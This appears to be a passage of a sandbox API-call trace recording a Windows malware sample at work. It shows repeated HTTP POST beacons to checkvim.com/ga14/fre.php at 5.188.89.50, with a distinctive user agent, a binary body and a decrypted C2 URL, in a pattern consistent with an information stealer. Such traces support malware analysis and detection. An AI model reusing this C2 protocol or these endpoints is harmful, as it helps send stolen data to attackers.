ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0321.297] GetProcessHeap () returned 0x840000 [0321.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0321.297] socket (af=2, type=1, protocol=6) returned 0x578 [0321.298] connect (s=0x578, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0321.365] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0321.365] GetProcessHeap () returned 0x840000 [0321.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0321.365] GetProcessHeap () returned 0x840000 [0321.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0321.366] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0321.367] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0321.367] GetProcessHeap () returned 0x840000 [0321.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0321.367] GetProcessHeap () returned 0x840000 [0321.367] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0321.367] GetProcessHeap () returned 0x840000 [0321.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0321.367] GetProcessHeap () returned 0x840000 [0321.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0321.368] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0321.368] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0321.368] GetProcessHeap () returned 0x840000 [0321.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0321.368] GetProcessHeap () returned 0x840000 [0321.368] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0321.368] send (s=0x578, buf=0x873a58*, len=237, flags=0) returned 237 [0321.369] send (s=0x578, buf=0x87eb58*, len=159, flags=0) returned 159 [0321.369] GetProcessHeap () returned 0x840000 [0321.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0321.369] recv (in: s=0x578, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0321.715] GetProcessHeap () returned 0x840000 [0321.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0321.715] GetProcessHeap () returned 0x840000 [0321.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0321.715] GetProcessHeap () returned 0x840000 [0321.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0321.715] GetProcessHeap () returned 0x840000 [0321.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0321.715] closesocket (s=0x578) returned 0 [0321.716] GetProcessHeap () returned 0x840000 [0321.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0321.716] GetProcessHeap () returned 0x840000 [0321.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0321.716] GetProcessHeap () returned 0x840000 [0321.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0321.716] GetProcessHeap () returned 0x840000 [0321.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0321.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x13a8) returned 0x578 [0321.717] Sleep (dwMilliseconds=0xea60) [0321.723] GetProcessHeap () returned 0x840000 [0321.724] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0321.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.725] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0321.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.731] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0321.738] GetProcessHeap () returned 0x840000 [0321.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0321.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.739] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0321.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.740] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0321.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.741] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.741] GetProcessHeap () returned 0x840000 [0321.741] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0321.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.742] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0321.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.743] CryptDestroyKey (hKey=0x87e870) returned 1 [0321.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.744] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0321.744] GetProcessHeap () returned 0x840000 [0321.744] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0321.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.746] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.748] GetProcessHeap () returned 0x840000 [0321.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0321.748] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0321.748] GetProcessHeap () returned 0x840000 [0321.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0321.748] GetProcessHeap () returned 0x840000 [0321.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0321.748] GetProcessHeap () returned 0x840000 [0321.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0321.748] GetProcessHeap () returned 0x840000 [0321.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0321.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0321.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.754] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0321.760] GetProcessHeap () returned 0x840000 [0321.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0321.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.762] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0321.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.763] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0321.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.764] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.764] GetProcessHeap () returned 0x840000 [0321.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0321.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.765] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0321.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.765] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0321.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.766] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0321.766] GetProcessHeap () returned 0x840000 [0321.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0321.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.767] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0321.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.768] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0321.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.769] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0321.769] GetProcessHeap () returned 0x840000 [0321.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0321.770] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0321.773] GetProcessHeap () returned 0x840000 [0321.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0321.773] socket (af=2, type=1, protocol=6) returned 0x57c [0321.773] connect (s=0x57c, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0321.838] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0321.838] GetProcessHeap () returned 0x840000 [0321.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0321.838] GetProcessHeap () returned 0x840000 [0321.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0321.839] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0321.840] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0321.840] GetProcessHeap () returned 0x840000 [0321.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0321.840] GetProcessHeap () returned 0x840000 [0321.840] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0321.840] GetProcessHeap () returned 0x840000 [0321.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0321.840] GetProcessHeap () returned 0x840000 [0321.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0321.841] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0321.841] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0321.841] GetProcessHeap () returned 0x840000 [0321.842] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0321.842] GetProcessHeap () returned 0x840000 [0321.842] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0321.842] send (s=0x57c, buf=0x873a58*, len=237, flags=0) returned 237 [0321.842] send (s=0x57c, buf=0x87eb58*, len=159, flags=0) returned 159 [0321.842] GetProcessHeap () returned 0x840000 [0321.842] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0321.842] recv (in: s=0x57c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0322.202] GetProcessHeap () returned 0x840000 [0322.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0322.202] GetProcessHeap () returned 0x840000 [0322.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0322.202] GetProcessHeap () returned 0x840000 [0322.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0322.202] GetProcessHeap () returned 0x840000 [0322.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0322.202] closesocket (s=0x57c) returned 0 [0322.203] GetProcessHeap () returned 0x840000 [0322.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0322.203] GetProcessHeap () returned 0x840000 [0322.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0322.203] GetProcessHeap () returned 0x840000 [0322.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0322.203] GetProcessHeap () returned 0x840000 [0322.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0322.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x45c) returned 0x57c [0322.204] Sleep (dwMilliseconds=0xea60) [0322.209] GetProcessHeap () returned 0x840000 [0322.209] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0322.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.210] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0322.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.215] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0322.221] GetProcessHeap () returned 0x840000 [0322.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0322.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.222] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0322.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.223] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0322.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.224] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.224] GetProcessHeap () returned 0x840000 [0322.224] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0322.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.238] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0322.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.240] CryptDestroyKey (hKey=0x87e470) returned 1 [0322.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.240] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0322.241] GetProcessHeap () returned 0x840000 [0322.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0322.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.241] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.242] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.243] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.244] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.244] GetProcessHeap () returned 0x840000 [0322.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0322.244] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0322.244] GetProcessHeap () returned 0x840000 [0322.244] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0322.244] GetProcessHeap () returned 0x840000 [0322.244] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0322.244] GetProcessHeap () returned 0x840000 [0322.244] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0322.244] GetProcessHeap () returned 0x840000 [0322.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0322.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.245] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0322.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.249] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0322.254] GetProcessHeap () returned 0x840000 [0322.254] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0322.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.255] CryptImportKey (in: hProv=0x86f820, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0322.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.256] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0322.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.256] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.256] GetProcessHeap () returned 0x840000 [0322.256] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0322.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.257] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0322.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.258] CryptDestroyKey (hKey=0x87e270) returned 1 [0322.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.259] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0322.259] GetProcessHeap () returned 0x840000 [0322.259] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0322.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.260] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0322.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.260] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0322.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.261] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0322.261] GetProcessHeap () returned 0x840000 [0322.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0322.261] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0322.263] GetProcessHeap () returned 0x840000 [0322.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0322.263] socket (af=2, type=1, protocol=6) returned 0x580 [0322.263] connect (s=0x580, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0322.331] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0322.331] GetProcessHeap () returned 0x840000 [0322.331] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0322.331] GetProcessHeap () returned 0x840000 [0322.331] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0322.332] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0322.333] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0322.333] GetProcessHeap () returned 0x840000 [0322.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0322.333] GetProcessHeap () returned 0x840000 [0322.333] HeapFree 